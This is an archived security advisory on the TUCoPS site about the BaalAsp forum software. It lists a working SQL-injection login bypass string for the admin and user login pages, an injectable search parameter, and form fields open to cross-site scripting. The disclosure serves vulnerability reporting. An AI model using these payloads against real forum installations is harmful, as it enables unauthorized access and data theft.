Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: b06-5833.htm

BaalAsp forum
BaalAsp forum
BaalAsp forum

vendor site: 
product:BaalAsp forum  
bug:login bypass, injection sql post, xss post

authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='

injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine

xss post : 
vulnerables fields :
- Subject:
- Group Name:
- Message:

laurent gaffi=E9 & benjamin moss=E9 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH